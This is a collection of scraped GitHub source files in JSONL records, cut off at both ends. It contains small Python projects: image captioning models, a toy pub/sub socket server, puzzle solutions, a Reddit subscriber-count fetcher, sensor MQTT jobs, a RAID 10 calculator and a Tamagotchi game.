[self.embeddings_map])\n \n @property\n def trainable_weights(self):\n return self.trainable_variables\n \n @property\n def variables(self):\n return (self.image_caption_cell.variables \n + self.logits_layer.variables \n + [self.embeddings_map])\n \n @property\n def weights(self):\n return self.variables\n ","repo_name":"brandontrabucco/detailed_captioning","sub_path":"detailed_captioning/layers/image_captioner.py","file_name":"image_captioner.py","file_ext":"py","file_size_in_byte":5806,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"3010493308","text":"from nltk.corpus import stopwords\n\ncachedStopWords = stopwords.words(\"english\")\n\ndef removeStop(text):\n\t#text = 'hello bye the the hi'\n\ttext = ' '.join([word for word in text.read().split() if word not in cachedStopWords])\n\ttext_file = open(\"Output.txt\", \"w\")\n\ttext_file.write(\"%s\" % text)\n\ttext_file.close()\n\ntext = open('abs.txt','r')\n\nremoveStop(text)","repo_name":"Prateek2901/StopWords_Extraction","sub_path":"stopwords.py","file_name":"stopwords.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7547697483","text":"import socket\nimport argparse\nfrom threading import Thread, Event, Lock, Timer\nimport json\n\n\nclass Client(Thread):\n def __init__(self, conn, index, cb_close, cb_msg):\n Thread.__init__(self)\n self._conn = conn\n self._index = index\n self._signal = Event()\n self._cb_close = cb_close\n self._cb_msg = cb_msg\n\n @property\n def index(self):\n return self._index\n\n def stop(self):\n self._signal.set()\n\n def send_msg(self, msg):\n self._conn.sendall(msg.encode('utf-8'))\n return\n\n def run(self):\n self._conn.settimeout(0.1)\n while not self._signal.is_set():\n try:\n data = self._conn.recv(1024)\n if data == b'':\n print(f\"client#{self._index} disconnected\")\n self._cb_close(self)\n break\n self._cb_msg(self, data.decode())\n except socket.timeout:\n continue\n except:\n print(f\"client#{self._index} disconnected yep\")\n self._cb_close(self)\n break\n self._conn.close()\n\n\nclass ConnectHandler:\n def __init__(self):\n self._threads = {}\n self._topics = {}\n self._index = 0\n self._mutex = Lock()\n\n def remove_clients(self):\n print(\"remove clients\")\n for _, thread in self._threads.items():\n if thread.is_alive():\n thread.stop()\n thread.join()\n\n def _erase_client(self, index):\n try:\n thread = self._threads[index]\n if thread.is_alive():\n thread.stop()\n thread.join()\n del self._threads[index]\n print(\"removed client#{}, total connections: {}\".format(index, len(self._threads)))\n except:\n print(\"client#{} already removed!\".format(index))\n\n def remove_client(self, client):\n removes = []\n for topic, indexes in self._topics.items():\n if client.index in indexes:\n with self._mutex:\n self._topics[topic].remove(client.index)\n print(f\"removed client#{client.index} from topic {topic}\")\n if not self._topics[topic]:\n removes.append(topic)\n for topic in removes:\n del self._topics[topic]\n print(f\"removed topic {topic}\")\n Timer(0.01, self._erase_client, args=[client.index,]).start()\n\n def _send_msg(self, client, status, msg):\n res = {\n \"status\": status,\n \"msg\": msg\n }\n client.send_msg(json.dumps(res))\n\n def _cmd_pub(self, client, cmd):\n if \"topic\" not in cmd.keys():\n self._send_msg(client, \"fail, \"\"missing topic\")\n return\n if \"msg\" not in cmd.keys():\n self._send_msg(client, \"fail\", \"missing message\")\n return\n topic = cmd['topic']\n msg = {\n \"action\": \"pub\",\n \"topic\": topic,\n \"msg\": cmd['msg']\n }\n if topic not in self._topics:\n msg['clients'] = 0\n self._send_msg(client, \"ok\", msg)\n else:\n res = {\n \"topic\": topic,\n \"msg\": cmd['msg']\n }\n with self._mutex:\n for index in self._topics[topic]:\n try:\n self._send_msg(self._threads[index], \"msg\", res)\n except:\n pass\n msg['clients'] = len(self._topics[topic])\n self._send_msg(client, \"ok\", msg)\n print('published message \"{}\" for {} clients on topic {}'.format(\n cmd['msg'], msg['clients'], topic\n ))\n\n\n def _cmd_sub(self, client, cmd):\n if \"topic\" not in cmd.keys():\n self._send_msg(client, \"fail\", \"missing topic\")\n return\n topic = cmd['topic']\n msg = {\n \"action\": \"sub\",\n \"topic\": topic\n }\n if topic not in self._topics:\n with self._mutex:\n self._topics[topic] = [client.index]\n print(f\"new topic {topic} with recipient client#{client.index}\")\n self._send_msg(client, \"ok\", msg)\n else:\n if client.index in self._topics[topic]:\n msg['msg'] = \"already subscribed\"\n self._send_msg(client, \"fail\", msg)\n else:\n with self._mutex:\n self._topics[topic].append(client.index)\n print(f\"add recipient client#{client.index} for topic {topic}\")\n self._send_msg(client, \"ok\", msg)\n\n def _cmd_unsub(self, client, cmd):\n if \"topic\" not in cmd.keys():\n self._send_msg(client, \"fail\", \"missing topic\")\n return\n topic = cmd['topic']\n msg = {\n \"action\": \"unsub\",\n \"topic\": topic\n }\n if topic not in self._topics:\n msg['msg'] = \"topic not found\"\n self._send_msg(client, \"fail\", msg)\n else:\n if client.index in self._topics[topic]:\n with self._mutex:\n self._topics[topic].remove(client.index)\n print(f\"removed client#{client.index} topic {topic}\")\n if not self._topics[topic]:\n del self._topics[topic]\n print(f\"removed topic {topic}\")\n self._send_msg(client, \"ok\", msg)\n else:\n msg['msg'] = \"topic not subscribed\"\n self._send_msg(client, \"fail\", msg)\n\n def _process_cmd(self, client, cmd):\n if \"cmd\" not in cmd.keys():\n self._send_msg(client, \"fail\", \"missing command\")\n return\n if cmd['cmd'] == \"pub\":\n self._cmd_pub(client, cmd)\n elif cmd['cmd'] == \"sub\":\n self._cmd_sub(client, cmd)\n elif cmd['cmd'] == \"unsub\":\n self._cmd_unsub(client, cmd)\n else:\n self._send_msg(client, \"fail\", \"undefined command\")\n\n def add_msg(self, client, msg):\n js = None\n try:\n js = json.loads(msg)\n except:\n self._send_msg(client, \"fail\", \"parsing error\")\n return\n self._process_cmd(client, js)\n\n def add_connection(self, conn):\n self._index += 1\n client = Client(conn, self._index, cb_close=self.remove_client, cb_msg=self.add_msg)\n client.start()\n self._threads[self._index] = client\n print(\"added client#{}, total connections: {}\".format(self._index, len(self._threads)))\n\n\nclass MQTTServer:\n def __init__(self, host, port):\n self._host = host\n self._port = port\n self._handler = ConnectHandler()\n\n def start(self):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock.bind((self._host, self._port))\n sock.listen()\n print(f\"start listening connections in {self._host}:{self._port}\")\n try:\n while True:\n conn, addr = sock.accept()\n print(\"new connection, address {}:{}\".format(addr[0], addr[1]))\n self._handler.add_connection(conn)\n except KeyboardInterrupt:\n print(\"keyboard interrupt\")\n finally:\n self._handler.remove_clients()\n print(\"closing server\")\n sock.close()\n\n\ndef parse_args():\n argp = argparse.ArgumentParser()\n argp.add_argument('--host', type=str, default='127.0.0.1')\n argp.add_argument('--port', type=int, default=12346)\n args = argp.parse_args()\n return args.host, args.port\n\ndef main():\n host, port = parse_args()\n server = MQTTServer(host, port)\n server.start()\n\nif __name__ == \"__main__\":\n main()","repo_name":"Yarviz/mqttdemo","sub_path":"src/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":7919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1176370740","text":"def day13b_mod():\r\n f = open('input\\\\input13.txt', 'r')\r\n lines = [line.strip() for line in f.readlines()]\r\n f.close()\r\n \r\n firewalls = {}\r\n for line in lines:\r\n data = line.split(':')\r\n depth = int(data[0])\r\n rng = int(data[1])\r\n firewalls[depth] = rng\r\n \r\n caught = True\r\n t=0\r\n while caught:\r\n caught = False\r\n for layer in sorted(list(firewalls.keys())):\r\n rng = firewalls[layer]\r\n if (layer+t) % (2*(rng-1)) == 0:\r\n caught = True\r\n if caught:\r\n t+= 1\r\n return t\r\n \r\nprint(day13b_mod())","repo_name":"boneillhawk/advent2017","sub_path":"day13b_mod.py","file_name":"day13b_mod.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4539451778","text":"class Solution(object):\n def palindromePairs(self, words):\n res = []\n if not words:\n return res\n\n d = {}\n for i in range(len(words)):\n d[words[i]] = i\n\n if \"\" in d:\n blankIndex = d[\"\"]\n for i in range(len(words)):\n if (self.isPalindrome(words[i])):\n if i == blankIndex:\n continue\n res.append([blankIndex, i])\n res.append([i, blankIndex])\n\n for i in range(len(words)):\n curr = words[i]\n curr_r = curr[::-1]\n if curr_r in d and d[curr_r] != i:\n res.append([i, d[curr_r]])\n\n for i in range(len(words)):\n curr = words[i]\n for cut in range(1, len(curr)):\n if self.isPalindrome(curr[:cut]):\n curr_r = (curr[cut:])[::-1]\n if curr_r in d and d[curr_r] != i:\n res.append([d[curr_r], i])\n\n if self.isPalindrome(curr[cut:]):\n curr_r = (curr[:cut])[::-1]\n if curr_r in d and d[curr_r] != i:\n res.append([i, d[curr_r]])\n\n return res\n\n def isPalindrome(self, s):\n i, j = 0, len(s) - 1\n while i <= j:\n if s[i] != s[j]:\n return False\n i += 1\n j -= 1\n return True\n\n\na = Solution().palindromePairs([\"abcd\",\"dcba\",\"lls\",\"s\",\"sssll\"])\nprint(a)","repo_name":"robbyvan/looseCannon","sub_path":"String/336_palindromePairs.py","file_name":"336_palindromePairs.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73962996003","text":"import numpy as np\nimport warnings\nwarnings.simplefilter(action='ignore', category=FutureWarning)\nfrom keras.utils import plot_model\nfrom keras.models import Model\nfrom keras import layers\n\nfrom keras.layers.merge import add\n\n# Image captioning model calss\nclass MLModel:\n def __init__(self, vocab_size, max_length, tokenizer):\n self.model = self._define_model(vocab_size, max_length, tokenizer)\n\n # define the captioning model\n def _define_model(self, vocab_size, max_length, tokenizer):\n # image feature extractor model\n image_input = layers.Input(shape=(4096,)) # 4069 is the output dim of the last VGG16 dense layer\n image_1 = layers.Dropout(0.5)(image_input)\n image_2 = layers.Dense(256, activation='relu')(image_1)\n # language sequence model\n embedding_matrix, embedding_dim = self._gen_embedding(tokenizer, vocab_size)\n language_input = layers.Input(shape=(max_length,))\n language_1 = layers.Embedding(vocab_size, 256, mask_zero=True)(language_input)\n language_2 = layers.Dropout(0.5)(language_1)\n language_3 = layers.LSTM(256)(language_2)\n # decoder model\n decoder1 = add([image_2, language_3])\n decoder2 = layers.Dense(25, activation='relu')(decoder1)\n output = layers.Dense(vocab_size, activation='softmax')(decoder2)\n\n model = Model(inputs=[image_input, language_input], outputs=output)\n model.compile(loss='categorical_crossentropy', optimizer='adam')\n model.summary()\n plot_model(model, to_file='model.png', show_shapes=True)\n return model\n\n def _gen_embedding(self, tokenizer, vocab_size):\n \"\"\"\n Generate the embedding_matrix and embedding_dim from a given pretrained GLOVE embedding model\n :param tokenizer: tokenizer from the training data\n :return: (embedding_matrix, embedding_dim)\n \"\"\"\n # Pretrained embedding\n pretrained_embedding_model_path = './glove.6B.100d.txt'\n embedding_dim = 100 # fixed by glove.6B. This number can be obtained from the vector size in file\n\n embeddings_index = {}\n with open(pretrained_embedding_model_path, 'r') as f:\n for line in f:\n values = line.split()\n word = values[0]\n coefs = np.asarray(values[1:], dtype='float32')\n embeddings_index[word] = coefs\n print('Found {} word vectors from model in {}.'.format(len(embeddings_index), pretrained_embedding_model_path ))\n\n embedding_matrix = np.zeros((vocab_size, embedding_dim))\n for word, i in tokenizer.word_index.items():\n if i < vocab_size:\n embedding_vector = embeddings_index.get(word)\n if embedding_vector is not None:\n embedding_matrix[i] = embedding_vector\n return embedding_matrix, embedding_dim\n\n def get_model(self):\n return self.model\n","repo_name":"chlin907/ImageCaptioningDeepLearning","sub_path":"image_captioning_utils/MLModel.py","file_name":"MLModel.py","file_ext":"py","file_size_in_byte":2935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25434656236","text":"from sympy import Symbol\n\n\nclass GaugeGroup():\n realBasis = ''\n\n def __init__(self, name, gpType, idb):\n self.idb = idb\n self.name = name\n self.type = gpType.upper()\n self.abelian = False\n self.g = Symbol(f'g_{self.name}', real=True)\n\n if self.type == 'U1':\n self.dim = 1\n self.abelian = True\n self.latex = 'U(1)'\n return\n\n self.repDic = {}\n\n self.dim = idb.get(self.type, 'dim')\n self.rank = idb.get(self.type, 'rank')\n self.sName = idb.get(self.type, 'name')\n\n self.structureConstants = idb.get(self.type, 'struct')\n\n # Latex name\n for i, c in enumerate(self.type):\n if c.isdigit():\n break\n\n base, n = self.type[:i], self.type[i:]\n if base not in ('E', 'F', 'G'):\n self.latex = base + '(' + str(n) + ')'\n else:\n self.latex = base + '_{' + n + '}'\n\n def dimR(self, rep):\n if rep not in self.repDic:\n self.computeRepInfo(rep)\n return self.repDic[rep][0]\n\n def repMat(self, rep):\n if rep not in self.repDic:\n self.computeRepInfo(rep)\n return self.repDic[rep][3]\n\n def repName(self, rep):\n if rep not in self.repDic:\n self.computeRepInfo(rep)\n return self.repDic[rep][4]\n\n\n def computeRepInfo(self, rep, noRepMats=False):\n \"\"\" Compute some useful info about the rep \"\"\"\n labels = rep\n dim = self.idb.get(self.type, 'dimR', rep)\n if not noRepMats:\n repMats = self.idb.get(self.type, 'repMatrices', rep, realBasis=self.realBasis)\n else:\n repMats = []\n fs = self.idb.get(self.type, 'frobenius', rep)\n tex = self.idb.get(self.type, 'repname', rep, latex=True)\n index = self.idb.get(self.type, 'dynkinIndex', rep)\n\n if fs == 1:\n repType = 'complex'\n elif fs == 0:\n repType = 'real'\n elif fs == -1:\n repType = 'pseudo-real'\n\n self.repDic[rep] = (dim, labels, repType, repMats, tex, index)\n\n\n def moreGroupInfo(self, N=10):\n \"\"\" Retrieve info about the first M irreps of the gauge group\n spanning the first possible N dimensions that the reps of the\n group may have (M >= N). \"\"\"\n\n try:\n self.idb.load()\n\n reps = self.idb.get(self.type, 'firstReps', N, table=False)\n\n # Compute rep info\n for r in reps:\n self.computeRepInfo(tuple(r), noRepMats=True)\n\n except SystemExit:\n exit()\n finally:\n self.idb.close()\n\n\n def copy(self):\n return GaugeGroup(self.name, self.type, self.idb)\n","repo_name":"LSartore/pyrate","sub_path":"src/Definitions/GaugeGroup.py","file_name":"GaugeGroup.py","file_ext":"py","file_size_in_byte":2748,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"54"} +{"seq_id":"1406190760","text":"#!/usr/bin/env python\nimport math\nimport Winding, Transformer, Machine\n\n# maybe like http://www.hammondmfg.com/pdf/EDB290AX.pdf\n\nprimary = Winding.Winding('p',120.0,0.0)\nsecondary5 = Winding.Winding('s',5.0,2.0)\nsecondary6 = Winding.Winding('s',6.3,2.0,taps=[50])\nsecondary300 = Winding.Winding('s',650.0,0.081,[50])\n\nt = Transformer.Transformer([secondary5,secondary6,primary,secondary300],90,have=1)\nt.circularMilsPerAmp = 600.0\nt.coreLoss = 0.66 # watts/lbs\nt.efficiency = 0.90 # 1/1.11 in wolpert p10\nt.lineFrequency = 60.0\nt.isolationThickness = 0.005\nt.stackingFactor = 0.92 # stacking factor wolpert p11 0.92 1x1 interleave, 0.95 butt stack\nt.lossFactor = 0.95 # 1/1.05 in wolpert p11\nt.wrappingThickness = 0.015\nt.WeightExtra = 1.15\n\n# t.laminationTable()\n\nt.fluxDensity = t.fluxFind(bmax=100000,inc=500)\n# t.fluxDensity = 70000\nt.compute()\nt.report()\n\n#t.fluxTable(sort='error')\n\nt.route()\nm = Machine.Machine(windings=t.windings)\nm.run()\n","repo_name":"holla2040/valvestudio","sub_path":"projects/transformerdesigner/power/650-5.0-6.3.py","file_name":"650-5.0-6.3.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"313034003","text":"#! /usr/bin/env python\n# encoding: utf-8\n\nimport waflib.Tools.asm\nfrom waflib.Tools import ar\ndef configure(conf):\n conf.find_program(conf.env.CC + ['gas','gcc'],var='AS')\n conf.env.AS_TGT_F=['-c','-o']\n conf.env.ASLNK_TGT_F=['-o']\n conf.find_ar()\n conf.load('asm')\n","repo_name":"cookingkode/nfv_platform","sub_path":"platform/waftools/myasm.py","file_name":"myasm.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"70919452003","text":"import random\nimport heapq\n\n# 힙을 활용한 탐색\ndef solution(a):\n\n answer = 0 # 결과값\n min_idx = a.index(min(a)) # 가장 작은 숫자의 인덱스\n answer += 1\n heap_left, heap_right = [], [] # min_idx를 기준으로 왼쪽, 오른쪽\n\n # 만약 min_idx의 왼쪽이 없을 경우\n if min_idx == 0:\n for i in range(min_idx+1, len(a)):\n heap_right.append((a[i],i))\n # 만약 min_idx의 오른쪽이 없을 경우\n elif min_idx == len(a) - 1:\n for j in range(min_idx):\n heap_left.append((a[j],j))\n # min_idx의 왼쪽, 오른쪽\n else:\n for i in range(min_idx+1, len(a)):\n heap_right.append((a[i],i))\n for j in range(min_idx):\n heap_left.append((a[j],j))\n\n # 왼쪽, 오른쪽 heap정렬\n heapq.heapify(heap_left)\n heapq.heapify(heap_right)\n\n temp = 1000000 # 확인용 변수\n while heap_left:\n chk_lmin = heapq.heappop(heap_left)\n chk_idx = chk_lmin[1]\n # 가장 작은 값 인덱스가 0인 경우\n if chk_idx == 0:\n answer += 1\n break\n # heap에서 가장 작은 값은 이전 값보다 왼쪽에 있어야함.\n elif chk_idx < temp:\n answer += 1\n temp = chk_idx\n\n temp2 = 0 # 확인용 변수\n while heap_right:\n chk_rmin = heapq.heappop(heap_right)\n chk_idx = chk_rmin[1]\n # 가장 작은 값 인덱스가 마지막인 경우\n if chk_idx == len(a) - 1:\n answer += 1\n break\n # heap에서 가장 작은 값은 이전 값보다 오른쪽에 있어야 함.\n elif chk_idx > temp2:\n temp2 = chk_idx\n answer += 1\n return answer\n\n# 단순 계�� 알고리즘(완전탐색)\ndef solution2(a):\n answer = 0\n\n minimum = min(a)\n min_idx = a.index(minimum)\n answer += 1\n min_lidx, min_ridx = 0, len(a) - 1\n\n if min_idx == 0:\n min_ridx = a.index(min(a[min_idx+1:]))\n answer += 1\n elif min_idx == len(a) - 1:\n min_lidx = a.index(min(a[:min_idx]))\n answer += 1\n else:\n min_ridx = a.index(min(a[min_idx + 1:]))\n min_lidx = a.index(min(a[:min_idx]))\n answer += 2\n\n while min_lidx > 0:\n min_lidx = a.index(min(a[:min_lidx]))\n answer += 1\n\n while min_ridx < len(a) - 1:\n min_ridx = a.index(min(a[min_ridx+1:]))\n answer += 1\n\n return answer\n\na = [-16,27,65,-2,58,-92,-71,-68,-61,-33]\nb = [9, -1, -5]\nc = [9, -1, -5, -2, -3]\nd = random.sample(range(-1000000,1000000),100)\n# print(len(d))\nprint(solution(d))\nprint(solution2(d))","repo_name":"hwan1753/algorithm","sub_path":"programmers/Pop the balloon.py","file_name":"Pop the balloon.py","file_ext":"py","file_size_in_byte":2641,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22540678795","text":"#!/usr/bin/python3\n\"\"\"A module containing function for working with number of subscribers\n\"\"\"\nimport requests\n\n\nURL = 'https://www.reddit.com'\n\n\ndef number_of_subscribers(subreddit):\n \"\"\"Retrives the number of subscibers in a given subreddit\n \"\"\"\n headers = {\n 'Accept': 'application/json',\n 'User-Agent': ' '.join([\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',\n 'AppleWebKit/537.36 (KHTML, like Gecko)',\n 'Chrome/112.0.0.0',\n 'Safari/537.36'\n ])\n }\n result = requests.get(\n '{}/r/{}/about/.json'.format(URL, subreddit),\n headers=headers,\n allow_redirects=False\n )\n if result.status_code == 200:\n return result.json()['data']['subscribers']\n return 0\n","repo_name":"yobocode/alx-system_engineering-devops","sub_path":"0x16-api_advanced/0-subs.py","file_name":"0-subs.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"30746771399","text":"w = int(input())\nh = int(input())\n\narea = w * h\n\n\nwhile area > 0:\n piece = input()\n if area > 0 and piece == \"STOP\":\n print(f'{area} pieces are left.')\n break\n area -= int(piece)\nelse:\n print(f'No more cake left! You need {abs(area)} pieces more.')\n","repo_name":"paunovaeleonora/SoftUni-Python-Basics-2020","sub_path":"While-Loop/cake.py","file_name":"cake.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5739831868","text":"# -*- encoding: utf-8 -*-\n\nimport time\n\nfrom mqtt_client import MqttClient\nfrom soil_moisture import detect_dry_or_wet\nfrom stpi_config import stpi_config\nfrom local_config import local_conf\nfrom DHT11 import get_temp_humi\n\n\ndef sub_watering_cmd():\n \"\"\" 启动mqtt监听 \"\"\"\n\n mqtt_cli2 = MqttClient('sub_watering_cmd')\n mqtt_cli2.mqtt_connect()\n mqtt_cli2.mqtt_subscribe(local_conf.mqtt_broker['SUB_WATERING_TOPIC'])\n\n\ndef pub_soil_moisture():\n \"\"\" 发布土壤湿度信息 \"\"\"\n\n mqtt_cli = MqttClient('pub_soil_moisture')\n mqtt_cli.mqtt_connect()\n soil_moisture = detect_dry_or_wet() or '1'\n topic = local_conf.mqtt_broker['PUB_SOIL_MOISTURE_TOPIC_PREFIX'] +\\\n stpi_config.PLANT_ID +\\\n '/' +\\\n str(int(time.time()))\n mqtt_cli.mqtt_publish(topic, soil_moisture, qos=2)\n return\n\n\ndef pub_temp_humi():\n \"\"\" 发布温湿度信息 \"\"\"\n\n temp, humi = get_temp_humi()\n if not temp and not humi:\n return\n mqtt_cli = MqttClient('pub_soil_moisture')\n mqtt_cli.mqtt_connect()\n topic = local_conf.mqtt_broker['PUB_TEMP_HUMI_TOPIC_PREFIX'] +\\\n stpi_config.PLANT_ID +\\\n '/' +\\\n str(int(time.time()))\n payload = str(int(temp)) + '_' + str(int(humi))\n mqtt_cli.mqtt_publish(topic, payload, qos=2)\n return\n","repo_name":"Erhao/SevenThirtyPi","sub_path":"mqtt_jobs.py","file_name":"mqtt_jobs.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36388346866","text":"import numpy as np\nimport cv2\n\nSTART = \"start\"\nEND = \"endseq\"\n\n\nclass HandGestureType(object):\n TEST1 = 0\n TEST2 = 1\n TEST3 = 3\n TEST4 = 4\n TEST5 = 5\n\n names = {TEST1: \"test1\", TEST2: \"test2\", TEST3: \"test3\", TEST4: \"test4\", TEST5: \"test5\"}\n\n\nclass RouteGenerator(object):\n \"\"\" \"\"\"\n def __init__(self,\n pre_trained_embedding_file,\n hand_classif_model,\n hand_classif_weights,\n captioner_model,\n captioner_weights,\n config_file,\n max_depth=25):\n self.hand_classif_model = cv2.readNetFromTensorflow(hand_classif_model, hand_classif_weights)\n self.captioner_model = cv2.readNetFromTensorflow(captioner_model, hand_classif_weights)\n\n def generate_hand_gesture(self, depth_image, goal_track):\n \"\"\"\n \"\"\"\n height, width = depth_image.shape\n depth_image = cv2.cvtColor(depth_image, cv2.COLOR_GRAY2RGB)\n blob = cv2.dnn.blobFromImages(depth_image,\n 1.0 / 255,\n (128, 128),\n (0, 0, 0),\n swapRB=False,\n crop=False)\n goal = goal_track.bbox.features(width, height).astype(\"float32\")\n gesture_id = self.model.setInput([blob, goal])\n return gesture_id\n\n def generate_route_description(object, hand_gesture_id):\n \"\"\"\n \"\"\"\n pass\n","repo_name":"AndrewJSchoen/uwds3","sub_path":"src/pyuwds3/reasoning/grounding/route_generator.py","file_name":"route_generator.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"23767692761","text":"def calculate_raid10_storage():\n # Solicita ao usuário o número de discos\n num_disks = int(input(\"Digite o número de discos: \"))\n\n # Solicita ao usuário a capacidade do menor disco\n\n menor = float('inf')\n \n for i in range(num_disks):\n disco = int(input(f\"Digite o valor do disco {i+1}: \"))\n if disco < menor:\n menor = disco\n\n # Calcula a capacidade total de armazenamento em RAID 10\n total_capacity = menor * num_disks / 2\n\n # Imprime a capacidade total de armazenamento e a capacidade reservada para segurança\n print(f\"A capacidade total de armazenamento em RAID 10 é {total_capacity}TB.\")\n\n# Chama a função\ncalculate_raid10_storage()\n","repo_name":"DavidSilvaProgrammer/FACAPE-4P","sub_path":"Arquitetura/CalculaRaid10VariavelMenor.py","file_name":"CalculaRaid10VariavelMenor.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37625294953","text":"class Solution(object):\n def buddyStrings(self, A, B):\n \"\"\"\n :type A: str\n :type B: str\n :rtype: bool\n \"\"\"\n if len(A) != len(B):\n return False\n d = []\n for i in range(len(A)):\n if A[i] != B[i]:\n d.append(i)\n if len(d) > 2:\n return False\n if len(d) == 1:\n return False\n if len(d) == 2:\n return A[d[0]] == B[d[1]] and A[d[1]] == B[d[0]]\n c = collections.Counter(A)\n for k, v in c.items():\n if v > 1:\n return True\n return False\n","repo_name":"qianlongzju/Leet_Code","sub_path":"Algorithms/py/859.BuddyStrings.py","file_name":"859.BuddyStrings.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38997856822","text":"#Exercício 07\n#Classe Bichinho Virtual. Crie uma classe que modele um Tamagushi (Bichinho Eletrônico):\n# \t> Atributos: Nome, Fome, Saúde e Idade;\n# \t> Métodos: Alterar Nome, Fome, Saúde e Idade; \n# \t> Retornar Nome, Fome, Saúde e Idade;\n# \tObs: Existe mais uma informação que devemos levar em consideração, o Humor do nosso tamagushi, este humor é\tuma combinação entre\n# \tos atributos Fome e Saúde, ou seja, um campo calculado, então não devemos criar um atributo para armazenar esta informação por \n# \tque ela pode ser calculada a qualquer momento.\nimport os\nimport time\n\nlista_frutas = [{'codigo': 1,'descricao': 'Maçã', 'valor_energetico': 10, 'saude': 10 },\n\t\t\t\t{'codigo': 2,'descricao':'Morango', 'valor_energetico': 2, 'saude': 20 },\n\t\t\t\t{'codigo': 3,'descricao': 'Melão', 'valor_energetico': 30, 'saude': 40 } ]\n\t\nlista_massas = [{'codigo': 1,'descricao': 'Lazanha', 'valor_energetico': 80, 'saude': 2},\n\t\t\t\t{'codigo': 2,'descricao': 'Macarrão', 'valor_energetico': 60, 'saude': 5},\n\t\t\t\t{'codigo': 3,'descricao': 'Panqueca', 'valor_energetico': 40, 'saude': 3} ]\n\nlista_doces = [{'codigo': 1, 'descricao': 'Bala', 'valor_energetico': 20, 'saude': -2},\n\t\t\t {'codigo': 2, 'descricao': 'Chocolate', 'valor_energetico': 20, 'saude': 1},\n\t\t\t {'codigo': 3, 'descricao': 'Doce de Leite', 'valor_energetico': 20, 'saude': -8} ]\n\t\nlista_bebidas = [{'codigo': 1, 'descricao': 'Refrigerante', 'valor_energetico': 40, 'saude': -20},\n\t\t\t\t {'codigo': 2, 'descricao': 'Suco Natural', 'valor_energetico': 10, 'saude': 5},\n\t\t\t\t {'codigo': 3, 'descricao': 'Água', 'valor_energetico': 2, 'saude': 30} ]\n\nlista_remedios = [{'codigo': 1, 'descricao': 'Aspirina', 'valor_energetico': -2, 'saude': 3},\n\t\t\t\t {'codigo': 2, 'descricao': 'Dipirona', 'valor_energetico': -10, 'saude': 10},\n\t\t\t\t {'codigo': 3, 'descricao': 'Antibiotico', 'valor_energetico': -70, 'saude': 100} ]\n\nclass BichinhoEletrônico():\n\n\tdef __init__(self, nome='', fome=20, saude=80, idade=1):\n\t\tself.nome = nome\n\t\tself.fome = fome\n\t\tself.saude = saude\n\t\tself.idade = idade\n\t\n\tdef limpar_tela(self):\n\t\tif os.name == 'nt':\n\t\t\tos.system('cls')\n\t\telse:\n\t\t\tos.system('clear')\t\n\t\tprint('-' *50,'\\n')\n\t\tself.humor_bichinho()\n\t\tprint('-' *50)\n\n\tdef mostrar_bichinho(self):\n\t\tself.limpar_tela()\n\t\tif (self.idade >= 1) and (self.idade <= 3):\n\t\t\tclasse = 'Categoria: Bebê'\n\t\telif(self.idade >=4) and (self.idade <=10):\n\t\t\tclasse = 'Categoria: Criança'\n\t\telif(self.idade >= 11) and (self.idade <= 17):\n\t\t\tclasse = 'Categoria: Adolescente'\n\t\telif (self.idade >= 18) and (self.idade <= 25):\n\t\t\tclasse = 'Categoria: Jovem'\n\t\telif (self.idade >= 25) and (self.idade <= 60):\n\t\t\tclasse = 'Categoria: Adulto'\n\t\telse:\n\t\t\tclasse = 'Categoria: Idoso'\n\t\tprint('\\nNome -------------> {}' .format(self.nome) )\n\t\tprint('Fome -------------> {:<3} %' .format(self.fome) )\n\t\tprint('Saúde -------------> {:<3} %' .format(self.saude))\n\t\tprint('Idade -------------> {:<3}{:>25}' .format(self.idade, classe))\n\t\tprint('-' *50)\n\t\tself.menu()\n\t\n\tdef menu(self):\n\t\tprint('[1] - Alimentar {}' .format(self.nome))\n\t\tprint('[2] - Dar remédio para {}' .format(self.nome))\n\t\tprint('[3] - Colocar {} para dormir' .format(self.nome))\n\t\tprint('[4] - Abandonar {}' .format(self.nome))\n\t\twhile True:\n\t\t\topcao = int(input('\\n>> '))\n\t\t\tif opcao == 1:\n\t\t\t\tself.alimentando_bichinho()\n\t\t\t\tbreak\n\t\t\telif opcao == 2:\n\t\t\t\tself.saude_bichinho()\n\t\t\t\tbreak\n\t\t\telif opcao == 3:\n\t\t\t\tif os.name == 